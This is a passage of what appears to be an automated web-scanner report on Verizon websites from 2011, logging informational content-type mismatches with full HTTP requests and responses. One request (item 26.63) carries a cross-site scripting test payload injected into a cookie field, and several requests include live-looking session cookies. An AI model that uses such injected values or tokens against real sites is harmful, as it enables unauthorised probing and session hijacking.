BfyINKgQ....S.......d..i...W.....1s#...site:verizon.com ECSPCookies.7$..5iU1lTvG3BKK0sQKszpnQCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||
...[SNIP]...

26.58. http://www.verizonbusiness.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verizonbusiness.com
Path:	/crossdomain.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml; charset=ISO-8859-1

The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.11.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "acc7f083353a5d96028f4e1a6ee9652a"
Last-Modified: Wed, 24 Nov 2010 20:41:29 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/xml; charset=ISO-8859-1
Content-Length: 475
Date: Mon, 05 Sep 2011 22:26:28 GMT
Connection: close

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="enterprisecenter.verizon.com" />
<allow-acce
...[SNIP]...

26.59. http://www.verizonbusiness.com/sitemap/tips.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verizonbusiness.com
Path:	/sitemap/tips.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sitemap/tips.xml?callback=searchtips&_=1315279044884 HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.6.9.1315279041314; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:17:49 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "acd9627627407e5720803eb75fff05fb"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 41988
Date: Mon, 05 Sep 2011 22:17:49 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:17:47 GMT

searchtips={allpages: [{label: "Products", url:"/Products/", category:"Top Level"},
{label: "Solutions By Solutions", url:"/solutions/bysolutions/", category:"Top Level"},
{label: "Solutions By Need"
...[SNIP]...

26.60. http://www.verizonbusiness.com/templates/vzbar/bertprefs.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verizonbusiness.com
Path:	/templates/vzbar/bertprefs.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /templates/vzbar/bertprefs.json HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "85c726f186d020ffedbebbed8618305d"
Last-Modified: Mon, 05 Sep 2011 22:36:49 GMT
Content-Type: text/javascript
Content-Length: 15
Date: Mon, 05 Sep 2011 22:36:49 GMT
Connection: close
Cache-Control: no-cache="Set-Cookie"
Expires: Sun, 05 Sep 2010 16:36:49 GMT

({

});

26.61. http://www22.verizon.com/content/verizonglobalhome/gPromo.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/gPromo.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /content/verizonglobalhome/gPromo.aspx?getVal=1 HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: ak-sf=false; __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; hbxRet=Y; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21
Expires: Mon, 05 Sep 2011 22:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:14:29 GMT
Connection: close

,Y,FL;NY;PA,Y,807,,

26.62. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/setValues.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.63. http://www22.verizon.com/foryourhome/MyAccount/Unprotected/common/dock_new.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www22.verizon.com
Path:	/foryourhome/MyAccount/Unprotected/common/dock_new.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /foryourhome/MyAccount/Unprotected/common/dock_new.aspx?mypage=Y HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA07V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 05 Sep 2011 22:41:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:49 GMT
Content-Length: 29486
Connection: close

document.write("<div id=\"placeholder\"> <div id=\"DivDLoad\" style=\"display:none\"><style type =\"text/css\"> /* Gray Curves */.GtopLnav, .GbottomLnav { display: block; backgro
...[SNIP]...

26.64. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 2062
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/Images/truste_logo2.gif
Last-Modified: Thu, 01 Sep 2011 17:51:50 GMT
Accept-Ranges: bytes
ETag: "03f55d3cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:09 GMT
Connection: keep-alive

.PNG
.
...IHDR...t... ......[......PLTE........S..+VRS...37$......f.3..................fff.........KHJZu1........@.....o<H'** ..)........A.|~.. ?:;...K^*..3y.:........K..}...333........." ..c.1..f
...[SNIP]...

26.65. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 1788
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_continueS.gif
Last-Modified: Thu, 01 Sep 2011 17:51:54 GMT
Accept-Ranges: bytes
ETag: "099b7d5cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:08 GMT
Connection: keep-alive

.PNG
.
...IHDR...w.........!.q*....PLTE.33.33....""....................................................................ww.............................ww.......ww............................ww...
...[SNIP]...

26.66. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
